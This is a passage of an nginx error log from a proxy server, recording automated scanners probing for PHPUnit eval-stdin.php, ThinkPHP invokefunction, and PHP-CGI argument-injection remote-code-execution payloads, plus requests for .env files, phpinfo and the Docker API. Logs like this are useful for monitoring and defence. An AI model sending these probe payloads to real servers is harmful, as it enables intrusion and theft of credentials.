"/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:06 [error] 436#436: *316997 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:21:07 [error] 436#436: *316997 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 5.189.153.209, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:28:52 [error] 436#436: *317003 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 18:51:22 [error] 437#437: *317026 open() "/var/www/html/ncsi.txt" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1", host: "www.msftncsi.com", referrer: "http://91.82.83.208/" +2026/01/19 18:51:22 [error] 437#437: *317027 "/var/www/html/HNAP1/index.html" is not found (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /HNAP1/ HTTP/1.1", host: "91.82.83.208", referrer: "http://91.82.83.208/" +2026/01/19 19:09:25 [error] 437#437: *317045 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 19:21:15 [error] 437#437: *317073 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 19:31:58 [error] 437#437: *317092 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "91.82.83.208:80", referrer: "http://91.82.83.208:80/home.asp" +2026/01/19 19:45:09 [error] 437#437: *317106 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 19:46:57 [error] 437#437: *317112 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:46:57 [error] 437#437: *317113 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:46:57 [error] 437#437: *317114 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:46:58 [error] 437#437: *317115 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:46:58 [error] 438#438: *317116 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:46:58 [error] 438#438: *317117 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:00 [error] 438#438: *317120 open() "/var/www/html/staging/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /staging/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:01 [error] 438#438: *317121 open() "/var/www/html/app_dev.php/_profiler/open" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:01 [error] 438#438: *317122 open() "/var/www/html/phpinfo.php" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /phpinfo.php HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:01 [error] 438#438: *317123 "/var/www/html/info/index.html" is not found (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /info/ HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:02 [error] 438#438: *317124 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:02 [error] 438#438: *317125 "/var/www/html/phpinfo/index.html" is not found (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /phpinfo/ HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:02 [error] 438#438: *317126 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:02 [error] 438#438: *317127 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:02 [error] 438#438: *317128 open() "/var/www/html/.env.save" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env.save HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:02 [error] 438#438: *317129 open() "/var/www/html/demo/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /demo/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:02 [error] 438#438: *317131 open() "/var/www/html/staging/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /staging/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:02 [error] 435#435: *317132 open() "/var/www/html/app_dev.php/_profiler/open" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:03 [error] 435#435: *317133 open() "/var/www/html/phpinfo.php" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /phpinfo.php HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:03 [error] 435#435: *317134 "/var/www/html/info/index.html" is not found (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /info/ HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:03 [error] 435#435: *317135 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:03 [error] 435#435: *317136 "/var/www/html/phpinfo/index.html" is not found (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /phpinfo/ HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:03 [error] 435#435: *317137 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:03 [error] 435#435: *317138 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:47:03 [error] 435#435: *317139 open() "/var/www/html/.env.save" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env.save HTTP/1.1", host: "91.82.83.208" +2026/01/19 19:50:28 [error] 435#435: *317142 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:29:06 [error] 435#435: *317175 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:20 [error] 436#436: *317217 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:21 [error] 436#436: *317217 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:21 [error] 436#436: *317217 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:21 [error] 436#436: *317217 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:21 [error] 436#436: *317217 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:21 [error] 436#436: *317217 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:21 [error] 436#436: *317217 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:21 [error] 436#436: *317217 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:21 [error] 436#436: *317217 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:21 [error] 436#436: *317217 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:21 [error] 436#436: *317217 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:21 [error] 436#436: *317217 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 20:52:21 [error] 436#436: *317217 open() "/var/www/html/containers/json" failed (2: No such file or 